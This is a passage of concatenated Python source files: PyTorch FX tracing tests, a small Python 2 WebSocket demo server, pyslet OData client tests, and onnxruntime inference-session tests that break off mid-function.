def test_ast_rewriter_rewrites_assert_with_message(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z, "msg"
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_reassigns_submodules(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.bn = torch.nn.BatchNorm2d(100)
def forward(self, x: torch.Tensor):
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_submodule_manipulation_API(self):
class C(torch.nn.Module):
def __init__(self):
super(C, self).__init__()
self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.conv(torch.cat([self.param, x]))
class B(torch.nn.Module):
def __init__(self):
super(B, self).__init__()
self.linear = torch.nn.Linear(100, 200)
self.register_buffer("buf", torch.randn(2, 3))
self.net_c = C()
def forward(self, x):
return self.linear(torch.cat([self.buf, self.net_c(x)]))
class A(torch.nn.Module):
def __init__(self):
super(A, self).__init__()
self.net_b = B()
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.net_b(x) + self.param
a = symbolic_trace(A())
a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
with a.graph.inserting_before(conv):
dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
args=conv.args)
conv.replace_all_uses_with(dropout)
a.graph.erase_node(conv)
a.recompile()
def module_exists(gm: GraphModule, path: str) -> bool:
return any(path == name for name, _ in gm.named_modules())
def parameter_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_parameters())
and any(path == name for name in gm.state_dict().keys()))
def buffer_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_buffers())
and any(path == name for name in gm.state_dict().keys()))
# Test that we added the "dropout" submodule
self.assertTrue(module_exists(a, "net_b.net_c.dropout"))
# Test `get_submodule` with an added submodule
self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))
# Test that the "conv" submodule is still there
self.assertTrue(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with an original module
self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))
# Test that the "conv" node is NOT still there
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
self.assertEqual(conv, [])
a.delete_submodule("net_b.net_c.conv")
# Test that the "conv" submodule is now gone
self.assertFalse(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with a deleted submodule
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`conv`"):
self.assertIsNone(a.get_submodule("net_b.net_c.conv"))
# Test `get_attr` warnings
cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]
with a.graph.inserting_before(cat):
with warnings.catch_warnings(record=True) as w:
param = a.graph.get_attr(qualified_name="net_b.net_c.param")
self.assertEqual(len(w), 0)
with self.assertWarnsRegex(UserWarning, "Attempted to "
"insert a get_attr Node with no "
"underlying reference in the "
"owning GraphModule"):
bad_param = a.graph.get_attr(qualified_name="net_b.param")
a.graph.erase_node(bad_param)
cat.args = (*cat.args, param)
a.recompile()
a.graph.lint()
# Test `get_parameter`
a.get_parameter("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "is not an "
"nn.Parameter"):
a.get_parameter("net_b.buf")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`param`"):
a.get_parameter("net_b.param")
# Test `get_buffer`
a.get_buffer("net_b.buf")
with self.assertRaisesRegex(AttributeError, "is not a "
"buffer"):
a.get_buffer("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`buf`"):
a.get_buffer("net_b.net_c.buf")
# Test non-nested attributes
a.get_submodule("")
a.get_parameter("param")
# Insert some unused submodules
a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))
# Garbage collection
a.delete_all_unused_submodules()
# Test that all the unused submodules are gone
self.assertFalse(module_exists(a, "net_b.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
self.assertFalse(module_exists(a, "batch_norm_2d"))
# Test that we didn't delete any unused Parameters or buffers
self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
self.assertTrue(buffer_exists(a, "net_b.buf"))
a.graph.lint()
def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer("my_buff", torch.rand(3, 4))
self.register_parameter(
"my_param", torch.nn.Parameter(torch.rand(3, 4))
)
def forward(self, x):
return x + self.my_buff + self.my_param
mod = MyModule()
mod_traced = symbolic_trace(mod)
# Create new GraphModule based on original, either w/ dict or root module.
orig_buff = mod_traced.get_buffer("my_buff")
orig_param = mod_traced.get_parameter("my_param")
mod_traced_new = GraphModule(
{"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
mod_traced.graph,
)
# Check that both my_buff and my_param are found and the same.
try:
new_buff = mod_traced_new.get_buffer("my_buff")
except Exception:
self.fail("Did not find my_buff")
self.assertEqual(orig_buff, new_buff)
try:
new_param = mod_traced_new.get_parameter("my_param")
except Exception:
self.fail("Did not find my_param")
self.assertEqual(orig_param, new_param)
x = torch.rand(3, 4)
orig_out = mod_traced(x)
submodules_out = mod_traced_new(x)
self.assertEqual(orig_out, submodules_out)
def test_graph_module_init_buffer_param_copied_dict_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=True)
def test_graph_module_init_buffer_param_copied_mod_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=False)
def test_annotations_with_no_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
return a(x[0])
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
return a(x)[0]
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
@unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
"`annotations` is not defined in Python <3.7")
def test_annotation_with_future(self):
try:
import fx.test_future # noqa: F401
finally:
del sys.modules["__future__"]
@skipIfNoTorchVision
def test_cpatcher(self):
cnt = 0
def patched_impl(to_patch, args, kwargs):
nonlocal cnt
cnt += 1
return to_patch(*args, **kwargs)
c_patch_enabled = True
def patched_in(to_patch, args, kwargs):
nonlocal c_patch_enabled
try:
c_patch_enabled = False
r = patched_impl(to_patch, args, kwargs)
finally:
c_patch_enabled = True
return r
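# sys.setprofile reports a 'c_call' event whenever a C/builtin function is
# entered; the hook below uses that to route each C call through
# torch._C._fx.patch_function, which counts invocations via patched_impl.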
def trace_func(frame, action, arg):
if action == 'c_call':
if c_patch_enabled:
torch._C._fx.patch_function(arg, patched_in)
import torch
from torchvision.models.resnet import resnet18
rn = resnet18()
try:
sys.setprofile(trace_func)
rn(torch.rand(1, 3, 224, 224))
print("testing print patch")
finally:
sys.setprofile(None)
assert(cnt != 0)
def test_randn(self):
def f():
return torch.randn(3, 3)
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=False)
assert(all(i.target != torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
def run_getitem_target():
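# Run in a subprocess by test_getitem_subproc: temporarily registers
# Tensor.__getitem__ in FX's wrapped-methods list so indexing is traced,
# then restores the list in the finally block.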
from torch.fx.symbolic_trace import _wrapped_methods_to_patch
_wrapped_methods_to_patch.append((torch.Tensor, "__getitem__"))
try:
TestFX().getitem_inner()
finally:
_wrapped_methods_to_patch.pop()
class TestOperatorSignatures(JitTestCase):
@onlyCPU
@ops(op_db, allowed_dtypes=(torch.float,))
def test_get_torch_func_signature_exhaustive(self, device, dtype, op):
known_no_schema = {'stack', 'hstack', 'vstack', 'dstack', 'repeat', '__getitem__', 'linalg.multi_dot',
'polygamma'}
try:
sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False)
schemas = get_signature_for_torch_op(op.op)
if not schemas:
raise RuntimeError('No Schemas Returned')
for sample_input in sample_inputs_itr:
# Iterate through overloads until we hit a match. If we exit this
# loop via `else`, we haven't found a match
for schema in schemas:
try:
bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs)
bound_args.apply_defaults()
op(*bound_args.args, **bound_args.kwargs)
break
except TypeError as e:
pass
else:
raise RuntimeError(f'Did not match any schemas for op {op.name}!')
except Exception as e:
assert op.name in known_no_schema
class TestFunctionalTracing(JitTestCase):
IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary",
"has_torch_function_variadic", "handle_torch_function",
"boolean_dispatch")
TO_PATCH = {"has_torch_function": None,
"has_torch_function_unary": None,
"has_torch_function_variadic": None}
BUILT_IN_FUNC = (AssertionError, "")
PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable")
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default")
ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$")
CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow")
INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined")
UNTRACEABLE_FUNCTIONALS = {
"adaptive_avg_pool1d": BUILT_IN_FUNC,
"avg_pool1d": BUILT_IN_FUNC,
"avg_pool2d": BUILT_IN_FUNC,
"avg_pool3d": BUILT_IN_FUNC,
"celu_": BUILT_IN_FUNC,
"channel_shuffle": BUILT_IN_FUNC,
"conv1d": BUILT_IN_FUNC,
"conv2d": BUILT_IN_FUNC,
"conv3d": BUILT_IN_FUNC,
"conv_tbc": BUILT_IN_FUNC,
"conv_transpose1d": BUILT_IN_FUNC,
"conv_transpose2d": BUILT_IN_FUNC,
"conv_transpose3d": BUILT_IN_FUNC,
"cosine_similarity": BUILT_IN_FUNC,
"elu_": BUILT_IN_FUNC,
"hardtanh_": BUILT_IN_FUNC,
"leaky_relu_": BUILT_IN_FUNC,
"logsigmoid": BUILT_IN_FUNC,
"one_hot": BUILT_IN_FUNC,
"pdist": BUILT_IN_FUNC,
"pixel_shuffle": BUILT_IN_FUNC,
"pixel_unshuffle": BUILT_IN_FUNC,
"relu_": BUILT_IN_FUNC,
"rrelu_": BUILT_IN_FUNC,
"selu_": BUILT_IN_FUNC,
"softplus": BUILT_IN_FUNC,
"softshrink": BUILT_IN_FUNC,
"threshold_": BUILT_IN_FUNC,
"adaptive_avg_pool2d": LEN_ERROR,
"adaptive_avg_pool3d": LEN_ERROR,
"adaptive_max_pool2d_with_indices": LEN_ERROR,
"adaptive_max_pool3d_with_indices": LEN_ERROR,
"instance_norm": LEN_ERROR,
"pad": LEN_ERROR,
"adaptive_max_pool1d": PROXY_ITERABLE,
"adaptive_max_pool2d": PROXY_ITERABLE,
"adaptive_max_pool3d": PROXY_ITERABLE,
"fractional_max_pool2d": PROXY_ITERABLE,
"fractional_max_pool3d": PROXY_ITERABLE,
"max_pool1d": PROXY_ITERABLE,
"max_pool2d": PROXY_ITERABLE,
"max_pool3d": PROXY_ITERABLE,
"group_norm": PROXY_ITERATED,
"lp_pool2d": PROXY_ITERATED,
"max_unpool1d": PROXY_ITERATED,
"max_unpool2d": PROXY_ITERATED,
"max_unpool3d": PROXY_ITERATED,
"adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"hardshrink": ARG_TYPE_MISMATCH,
"layer_norm": ARG_TYPE_MISMATCH,
"lp_pool1d": ARG_TYPE_MISMATCH,
"max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"pairwise_distance": ARG_TYPE_MISMATCH,
"affine_grid": CONTROL_FLOW,
"alpha_dropout": CONTROL_FLOW,
"batch_norm": CONTROL_FLOW,
"binary_cross_entropy": CONTROL_FLOW,
"binary_cross_entropy_with_logits": CONTROL_FLOW,
"celu": CONTROL_FLOW,
"cosine_embedding_loss": CONTROL_FLOW,
"cross_entropy": CONTROL_FLOW,
"ctc_loss": CONTROL_FLOW,
"dropout": CONTROL_FLOW,
"dropout2d": CONTROL_FLOW,
"dropout3d": CONTROL_FLOW,
"elu": CONTROL_FLOW,
"embedding": CONTROL_FLOW,
"embedding_bag": CONTROL_FLOW,
"feature_alpha_dropout": CONTROL_FLOW,
"fold": CONTROL_FLOW,
"gaussian_nll_loss": CONTROL_FLOW,
"glu": CONTROL_FLOW,
"grid_sample": CONTROL_FLOW,
"gumbel_softmax": CONTROL_FLOW,
"hardsigmoid": CONTROL_FLOW,
"hardswish": CONTROL_FLOW,
"hardtanh": CONTROL_FLOW,
"hinge_embedding_loss": CONTROL_FLOW,
"huber_loss": CONTROL_FLOW,
"interpolate": CONTROL_FLOW,
"kl_div": CONTROL_FLOW,
"l1_loss": CONTROL_FLOW,
"leaky_relu": CONTROL_FLOW,
"local_response_norm": CONTROL_FLOW,
"margin_ranking_loss": CONTROL_FLOW,
"mse_loss": CONTROL_FLOW,
"multi_head_attention_forward": CONTROL_FLOW,
"multi_margin_loss": CONTROL_FLOW,
"multilabel_margin_loss": CONTROL_FLOW,
"multilabel_soft_margin_loss": CONTROL_FLOW,
"nll_loss": CONTROL_FLOW,
"poisson_nll_loss": CONTROL_FLOW,
"relu": CONTROL_FLOW,
"relu6": CONTROL_FLOW,
"rrelu": CONTROL_FLOW,
"selu": CONTROL_FLOW,
"silu": CONTROL_FLOW,
"smooth_l1_loss": CONTROL_FLOW,
"soft_margin_loss": CONTROL_FLOW,
"threshold": CONTROL_FLOW,
"triplet_margin_loss": CONTROL_FLOW,
"triplet_margin_with_distance_loss": CONTROL_FLOW,
"unfold": CONTROL_FLOW,
"upsample": CONTROL_FLOW,
"upsample_bilinear": INTERPOLATE_ARGS_CONFLICT,
"upsample_nearest": INTERPOLATE_ARGS_CONFLICT,
}
# List of nn.functionals with Tensor inputs but not with type annotation
FUNCTIONALS_WITHOUT_ANNOTATION = (
"adaptive_max_pool1d",
"adaptive_max_pool2d",
"adaptive_max_pool3d",
"fractional_max_pool2d",
"fractional_max_pool3d",
"max_pool1d",
"max_pool2d",
"max_pool3d",
"gaussian_nll_loss",
"upsample",
"upsample_bilinear",
"upsample_nearest",
)
# Inconsistent behavior between Python 3.8 and other Python versions:
# - Python 3.8: Re-raise internal exception like `PROXY_ITERATED`
# - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same
# internal exception above
# Use the following map to override the expected exception for Python 3.8
UNTRACEABLE_FUNCTIONALS_PY38 = {
"adaptive_max_pool1d": PROXY_ITERATED,
"adaptive_max_pool2d": PROXY_ITERATED,
"adaptive_max_pool3d": PROXY_ITERATED,
"fractional_max_pool2d": PROXY_ITERATED,
"fractional_max_pool3d": PROXY_ITERATED,
"max_pool1d": PROXY_ITERATED,
"max_pool2d": PROXY_ITERATED,
"max_pool3d": PROXY_ITERATED,
"group_norm": LEN_ERROR
}
@classmethod
def _get_functional(cls):
functional_list = []
for f in dir(torch.nn.functional):
if not f.islower():
continue
# Ignore internal functions
if f.startswith('_'):
continue
# Ignore supporting functions
if f in cls.IGNORE_FUNCS:
continue
fn = getattr(torch.nn.functional, f)
# Ignore non-callable object like modules
if not isinstance(fn, Callable):
continue
if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION:
try:
sig = inspect.signature(fn)
has_tensor_arg = False
for arg, param in sig.parameters.items():
if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor):
has_tensor_arg = True
if not has_tensor_arg:
continue
# No signature or Object is not supported
except ValueError:
pass
functional_list.append((f, fn))
return functional_list
@classmethod
def generate_test_func(cls, func_name, fn):
def functional_test(self):
if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \
sys.version_info >= (3, 8) and sys.version_info < (3, 9):
exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
elif func_name in self.UNTRACEABLE_FUNCTIONALS:
exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
else:
symbolic_trace(fn)
return functional_test
@classmethod
def generate_tests(cls):
functional_list = cls._get_functional()
for func_name, fn in functional_list:
test_name = "test_nn_functional_" + func_name
functional_test = cls.generate_test_func(func_name, fn)
setattr(cls, test_name, functional_test)
@classmethod
def setUpClass(cls):
def no(*args, **kwargs):
return False
for name in cls.TO_PATCH.keys():
cls.TO_PATCH[name] = getattr(torch.nn.functional, name)
setattr(torch.nn.functional, name, no)
@classmethod
def tearDownClass(cls):
for name in cls.TO_PATCH.keys():
setattr(torch.nn.functional, name, cls.TO_PATCH[name])
TestFunctionalTracing.generate_tests()
instantiate_device_type_tests(TestOperatorSignatures, globals())
if __name__ == '__main__':
run_tests()
|
ws-server.py | #!/usr/bin/env python
# USAGE: ./ws-server.py & python -m SimpleHTTPServer 8888
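# Note: this is Python 2 code speaking the legacy pre-RFC 6455 (Hixie draft)
# WebSocket protocol, in which frames are delimited by 0x00/0xFF bytes. The
# advertised ws://localhost:8050/ does not match the port bound below (9876).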
import socket, threading, time
def handle(s):
print repr(s.recv(4096))
s.send('''
HTTP/1.1 101 Web Socket Protocol Handshake\r
Upgrade: WebSocket\r
Connection: Upgrade\r
WebSocket-Origin: http://localhost:8888\r
WebSocket-Location: ws://localhost:8050/\r
WebSocket-Protocol: sample
'''.strip() + '\r\n\r\n')
time.sleep(1)
s.send('\x00hello\xff')
time.sleep(1)
s.send('\x00world\xff')
s.close()
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', 9876))
s.listen(1)
while 1:
t, _ = s.accept()
threading.Thread(target=handle, args=(t,)).start()
|
test_odata2_client.py | #! /usr/bin/env python
import decimal
import logging
import random
import threading
import time
import unittest
from wsgiref.simple_server import make_server, WSGIRequestHandler
from pyslet import rfc2396 as uri
from pyslet import rfc5023 as app
from pyslet.odata2 import core
from pyslet.odata2 import csdl as edm
from pyslet.odata2 import client
from pyslet.odata2.memds import InMemoryEntityContainer
from pyslet.odata2.server import Server
from test_odata2_core import DataServiceRegressionTests
HTTP_PORT = random.randint(1111, 9999)
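# A random port reduces clashes between concurrent test runs, though
# collisions with ports already in use remain possible.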
def suite(prefix='test'):
loader = unittest.TestLoader()
loader.testMethodPrefix = prefix
return unittest.TestSuite((
loader.loadTestsFromTestCase(ODataTests),
loader.loadTestsFromTestCase(ClientTests),
loader.loadTestsFromTestCase(RegressionTests)
))
def load_tests(loader, tests, pattern):
"""Called when we execute this file directly.
This rather odd definition includes a larger set of tests,
including ones whose names start with "tesx", which hit the sample
OData services on the internet."""
# return suite('test')
return suite('tes')
ODATA_SAMPLE_SERVICEROOT = \
"http://services.odata.org/V2/Northwind/Northwind.svc/"
ODATA_SAMPLE_READWRITE = \
"http://services.odata.org/(S(readwrite))/OData/OData.svc/"
class ODataTests(unittest.TestCase):
def test_constants(self):
pass
class ClientTests(unittest.TestCase):
def tesx_constructor(self):
c = client.Client(ODATA_SAMPLE_SERVICEROOT)
self.assertTrue(isinstance(c, app.Client),
"OData client not an APP client")
self.assertTrue(isinstance(c.service, app.Service),
"Service document is present")
self.assertTrue(len(c.service.Workspace) == 1,
"Service not returning a single Workspace child")
self.assertTrue(len(c.service.Workspace[0].Collection) > 0,
"Workspace empty")
self.assertTrue(isinstance(c.serviceRoot, uri.URI),
"Service root should be a URI instance")
self.assertTrue(len(c.feeds) > 0,
"At least one feed loaded from service")
self.assertTrue("Products" in c.feeds,
"One feed called Products required")
self.assertTrue(isinstance(c.feeds["Products"], edm.EntitySet),
"Feeds map to entity sets")
def tesx_feed_entries(self):
c = client.Client(ODATA_SAMPLE_SERVICEROOT)
# now open a collection and iterate through it
names = set()
with c.feeds['Products'].open() as collection:
n = len(collection)
self.assertTrue(
n > 10, "Sample has more than 10 products (found %i)" % n)
for product in collection.itervalues():
names.add(product['ProductName'].value)
self.assertTrue(n == len(names))
scottish_long_breads = collection[68]
self.assertTrue(isinstance(scottish_long_breads['ProductID'],
edm.Int32Value))
self.assertTrue(scottish_long_breads['ProductID'].value == 68)
self.assertTrue(isinstance(scottish_long_breads['ProductName'],
edm.StringValue))
self.assertTrue(scottish_long_breads['ProductName'].value ==
"Scottish Longbreads")
self.assertTrue(isinstance(scottish_long_breads['SupplierID'],
edm.Int32Value))
self.assertTrue(scottish_long_breads['SupplierID'].value == 8)
self.assertTrue(isinstance(scottish_long_breads['CategoryID'],
edm.Int32Value))
self.assertTrue(scottish_long_breads['CategoryID'].value == 3)
self.assertTrue(isinstance(scottish_long_breads['QuantityPerUnit'],
edm.StringValue))
self.assertTrue(
scottish_long_breads['QuantityPerUnit'].value ==
"10 boxes x 8 pieces")
self.assertTrue(isinstance(scottish_long_breads['UnitPrice'],
edm.DecimalValue))
self.assertTrue(
scottish_long_breads['UnitPrice'].value.as_tuple() ==
decimal.Decimal("12.5000").as_tuple())
self.assertTrue(isinstance(scottish_long_breads['UnitsInStock'],
edm.Int16Value))
self.assertTrue(scottish_long_breads['UnitsInStock'].value == 6)
self.assertTrue(isinstance(scottish_long_breads['UnitsOnOrder'],
edm.Int16Value))
self.assertTrue(scottish_long_breads['UnitsOnOrder'].value == 10)
self.assertTrue(isinstance(scottish_long_breads['ReorderLevel'],
edm.Int16Value))
self.assertTrue(scottish_long_breads['ReorderLevel'].value == 15)
self.assertTrue(isinstance(scottish_long_breads['Discontinued'],
edm.BooleanValue))
self.assertFalse(scottish_long_breads['Discontinued'].value)
def tesx_orderby(self):
c = client.Client(ODATA_SAMPLE_SERVICEROOT)
with c.feeds['Products'].open() as collection:
collection.set_orderby(
core.CommonExpression.orderby_from_str("ProductName asc"))
first_value = None
last_value = None
for product in collection.itervalues():
last_value = product['ProductName'].value
if first_value is None:
first_value = last_value
self.assertTrue(
first_value == "Alice Mutton", "Bad first value: %s" % first_value)
self.assertTrue(
last_value == "Zaanse koeken", "Bad last value: %s" % last_value)
def tesx_filter(self):
c = client.Client(ODATA_SAMPLE_SERVICEROOT)
with c.feeds['Products'].open() as collection:
collection.set_filter(
core.CommonExpression.from_str(
"substringof('bread',ProductName)"))
self.assertTrue(len(collection) == 1)
product = collection.values()[0]
self.assertTrue(product['ProductName'] == "Scottish Longbreads")
scottish_long_breads = collection[68]
self.assertTrue(scottish_long_breads['ProductID'].value == 68)
try:
collection[17]
self.fail("Alice Mutton wasn't filtered")
except KeyError:
pass
def tesx_navigation(self):
c = client.Client(ODATA_SAMPLE_SERVICEROOT)
with c.feeds['Customers'].open() as collection:
customer = collection['ALFKI']
self.assertFalse(customer['Orders'].isExpanded)
with customer['Orders'].open() as orders:
self.assertTrue(len(orders) == 6, "Number of orders")
self.assertFalse(
isinstance(orders, edm.ExpandedEntityCollection))
# now test expansion
collection.set_expand({"Orders": None})
customer = collection['ALFKI']
self.assertTrue(customer['Orders'].isExpanded)
with customer['Orders'].open() as orders:
self.assertTrue(len(orders) == 6, "Number of orders")
self.assertTrue(
isinstance(orders, core.ExpandedEntityCollection))
class LoggingHandler(WSGIRequestHandler):
def log_message(self, format, *args):
logging.info(format, *args)
regressionServerApp = None
regressionTestsDone = False
def run_regression_server():
server = make_server(
'', HTTP_PORT, regressionServerApp, handler_class=LoggingHandler)
server.timeout = 10
logging.info("Serving HTTP on port %i... (timeout %s)", HTTP_PORT,
repr(server.timeout))
while not regressionTestsDone:
server.handle_request()
class RegressionTests(DataServiceRegressionTests):
def setUp(self): # noqa
global regressionServerApp
DataServiceRegressionTests.setUp(self)
self.container = InMemoryEntityContainer(
self.ds['RegressionModel.RegressionContainer'])
regressionServerApp = Server("http://localhost:%i/" % HTTP_PORT)
regressionServerApp.SetModel(self.ds.get_document())
t = threading.Thread(target=run_regression_server)
t.setDaemon(True)
t.start()
logging.info("OData Client/Server combined tests starting HTTP "
"server on localhost, port %i" % HTTP_PORT)
# yield time to allow the server to start up
time.sleep(2)
self.svcDS = self.ds
self.client = client.Client("http://localhost:%i/" % HTTP_PORT)
self.ds = self.client.model.DataServices
def tearDown(self): # noqa
global regressionTestsDone
DataServiceRegressionTests.tearDown(self)
regressionTestsDone = True
def test_all_tests(self):
self.run_combined()
if __name__ == "__main__":
logging.basicConfig(
level=logging.INFO, format="[%(thread)d] %(levelname)s %(message)s")
unittest.main()
|
onnxruntime_test_python.py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# -*- coding: UTF-8 -*-
import unittest
import os
import numpy as np
import onnxruntime as onnxrt
import threading
class TestInferenceSession(unittest.TestCase):
def get_name(self, name):
if os.path.exists(name):
return name
rel = os.path.join("testdata", name)
if os.path.exists(rel):
return rel
this = os.path.dirname(__file__)
data = os.path.join(this, "..", "testdata")
res = os.path.join(data, name)
if os.path.exists(res):
return res
raise FileNotFoundError(
"Unable to find '{0}' or '{1}' or '{2}'".format(name, rel, res))
def run_model(self, session_object, run_options):
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = session_object.get_inputs()[0].name
res = session_object.run([], {input_name: x}, run_options=run_options)
output_expected = np.array(
[[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
def testModelSerialization(self):
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "TestModelSerialization"
so.optimized_model_filepath = "./PythonApiTestOptimizedModel.onnx"
onnxrt.InferenceSession(self.get_name("mul_1.onnx"), sess_options=so)
self.assertTrue(os.path.isfile(so.optimized_model_filepath))
def testGetProviders(self):
self.assertTrue(
'CPUExecutionProvider' in onnxrt.get_available_providers())
self.assertTrue('CPUExecutionProvider' in onnxrt.get_all_providers())
sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx"))
self.assertTrue('CPUExecutionProvider' in sess.get_providers())
def testSetProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx"))
# confirm that CUDA Provider is in list of registered providers.
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
# reset the session and register only CPU Provider.
sess.set_providers(['CPUExecutionProvider'])
# confirm only CPU Provider is registered now.
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testInvalidSetProviders(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx"))
sess.set_providers(['InvalidProvider'])
self.assertTrue('[\'InvalidProvider\'] does not contain a subset of available providers' in str(
context.exception))
def testRunModel(self):
sess = onnxrt.InferenceSession(self.get_name("mul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array(
[[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModelFromBytes(self):
with open(self.get_name("mul_1.onnx"), "rb") as f:
content = f.read()
sess = onnxrt.InferenceSession(content)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array(
[[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2(self):
sess = onnxrt.InferenceSession(self.get_name("matmul_1.onnx"))
